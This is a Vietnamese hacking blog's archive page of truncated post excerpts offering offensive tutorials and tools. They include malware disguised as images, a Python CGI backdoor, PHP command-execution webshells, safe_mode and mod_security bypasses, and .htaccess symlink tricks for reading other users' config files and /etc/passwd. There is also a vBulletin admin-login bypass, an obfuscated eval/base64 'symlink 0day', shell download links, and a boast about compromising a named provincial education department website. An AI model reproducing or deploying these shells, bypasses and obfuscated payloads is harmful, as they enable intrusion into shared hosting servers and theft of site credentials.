J2TEAM Security: A must-have extension for Chrome users. Install now!
tháng 3 2012

About NMap

Nmap là công cụ quyét cổng hàng đầu, được các hacker, các nhà đánh giá an ninh mạng, các nhà quản trị mạng hay sử dụng cho công việc của mình. Sau …

Telnet trong windows 7

Trong Win 7, Telnet bị disable. Vì thế muốn Enable Telnet ta làm như sau: Vào Control Panel > Programs and Features > Turn Windows features on…

Ebook Sổ Tay Hacker 1.0

Download: http://www.mediafire.com/?6cp5191j7jq2yxu

[TUT] Malware dưới dạng file Ảnh

Bạn muốn người sử dụng Click vào Malware của bạn.... sau đây là 2 cách mình thấy hiệu quả. Bạn có thể đổi theo filetype tùy tích của bạn.. ở TUT này…

[TUT] - Local BSG.vn

Code: http://www.mediafire.com/?yxamlzqnntt

Perl, Python, Ruby bypass Open_BaseDir

[+] Đầu tiên ta hãy tìm hiểu xem cái open_basedir là cái wtf gì      http://id.php.net/manual/en/ini.core...i.open-basedir     Tạm dịch     Nó…

Symlink Python Forbidden Bypass

.htacesss Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .nothing AddHandler cgi-script .n…

CGI python backdoor

#!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cg…

Python Symlink Bypass

.htaccess Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .nothing AddHandler cgi-script .n…

Tut Bypass safemod voi Python shell

Shell: http://www.mediafire.com/?5x3a5a6eosycdza TUT: http://www.mediafire.com/?vn23naayg98aspb

Bypass mod_security thế nào?

Khi local đôi khi ta bị 500 hoặc 400 khi đó con shell đã bị mod_security chộp được làm sao để bypass nó nhỉ? [+] tùy biến lệnh [+] encode các stri…

Up shell safe mode

Mẫu code dùng để up shell server có safe mode đang ON vì lúc đó ko thể dùng các hàm system,exec,shell_exec... <?php touch(ugvn.php); chmod(&qu…

Windows server bypass shell PHP

<body bgcolor=black> <center><font color=green>COMMAND EXECUTER (CODED BY NEO)</font></center> <div align="ce…

LiteSpeed Bypass

Litespeed forbidden bypass ln -s /home/victimuser/public_html/config.php test.shtml .htaccess: Options +FollowSymLinks DirectoryIndex see…

Linux Bypass = safe_mode: ON

.htaccess Options +FollowSymLinks DirectoryIndex ssssss.htm Options All Indexes <IfModule mod_security.c> SecFilterEngine Off SecFilterS…

Forbiden bypass (ini method)

http://www.mediafire.com/?i2jes2db6w9inua   Khi symljnk thường ghi vào 1 file bất kì ln -s /home/user/public_html/includes/ confi…

ByPass cat, dir, less

Thường thì chúng ta cat ,dir ,less được bởi các file trong thư viện /user/bin/ chưa chmod nếu chmod ko run được thì up các file này lên rồi run .…

Bypass Login vBB

Up file ngang hàng index của forum vbb. Login với user mình muốn (kể cả Admin). <?php echo("?>".gzuncompress(base64_decode("e…

[HOW TO] Safe mode=on to Safe mode=off [tested and working]

by pass file php.ini bằng htaccess php.ini safemode = off register_globals = on .htccess suPHP_ConfigPath /home/user/public_html/php.ini

Safe off htaccess

Options +FollowSymLinks DirectoryIndex ssssss.htm Options All Indexes <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST…

Symlink ALL Config

Yêu cầu server chạy perl shell và ko dis hàm symljnk. tặng thêm con shell mới sau khi cat /etc/passwd xong copy hết bỏ vào file go.pl nó sẽ tự sym…

.htaccess

cgitelnet symlink htaccess symljnk ghi vào file.hack download file.hack về Options +ExecCGI AddHandler cgi-script cgi pl cgi love jpg Rewrit…

403 Forbidden bypass

http://junookyo.blogspot.com/2012/03/symljnk-bypass-view-filephp.html Nếu lại bị chặn forbidden thì chơi cách này: yêu cầu có quy…

Symlink forbidden bypass shell | ln -s permiison bypassed shell publiced

ln -s bypassed ~> symljnk từng user Tạo cgi_shell, python_shell ln -s bypass /etc/passwd  Link download: Click!

Not Forbidden Error New Symlink Bypass Method

<?PHP ############################### #All Right Reserved By Sun-Army [ Sun-Army.Org] #Coded By Nitr0jen26 -> nitr0jen26@asia.com #Break I…

Tấn công PHP File Inclusion

Thấy có người thắc mắc về vụ File inclusion này,mình sẽ lập 1 topic để giải đáp mọi vấn đề Local File Inclusion Basic Level: ví dụ trong trường h…

Fake Apache banner và PHP X-Powered-BY

Trong quá trình foot-printing chúng ta sẽ để ý đầu tiên là kết quả trả về của HTTP Header: Dựa theo phiên bản của php,apache mà atttacker dễ dàng k…

Remote win_server

Add user và set quyền administrator.

Copico Reverse Tool

Speed khá nhanh, ngoài ra còn có thể nhận diện được mã nguồn của site đó, anh em có thể thêm chức năng nhận diện mã nguồn trong file "cms.xml&q…

Hướng dẫn tạo trang redirect theo tình huống

Download: http://www.mediafire.com/?v4c8bjuacbp272t 1. Reditect theo referer: Tức là ta set nếu request từ 1 domain cho trước thì redirect đến tra…

[TUT] - Đoạt quyền Tayninh.edu.vn (Sở Giáo Dục Tây Ninh)

TUT by Z-Crew cua Vietmatrix Vẫn như mọi Post : " Chào anh chị em ! ". Sẵn yêu cầu của chị Mộ Bang nên em làm muôn cái TUT,anh chị em x…

Enable Remote Desktop (RDP) trên tất cả computers/servers với GPO

Mở bảng điều khiển Group Policy Management và mở rộng các chính sách mà bạn muốn chỉnh sửa, nhấp vào và chọn Edit. Tôi sẽ chỉnh sửa Defualt Domain …

Priv8 symlink() 0day coded by NazZ

Code: <?php // Symlink ByPass Tool // NaZZ // Credits to IT-Sec eval(gzinflate(str_rot13(base64_decode('Dc7HzptXAEDhx8l/xcIU0xRygYGhGNMxchPRwa…

Dizin shell

Code: <?php echo '<pre>'; $b0x = $_GET['b0x']; system("ls -la $b0x"); echo '<pre>'; $b0x2 = $_POST[&…

Joomla & Wordpress Login data Changer

Code: <html dir="ltr"> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equ…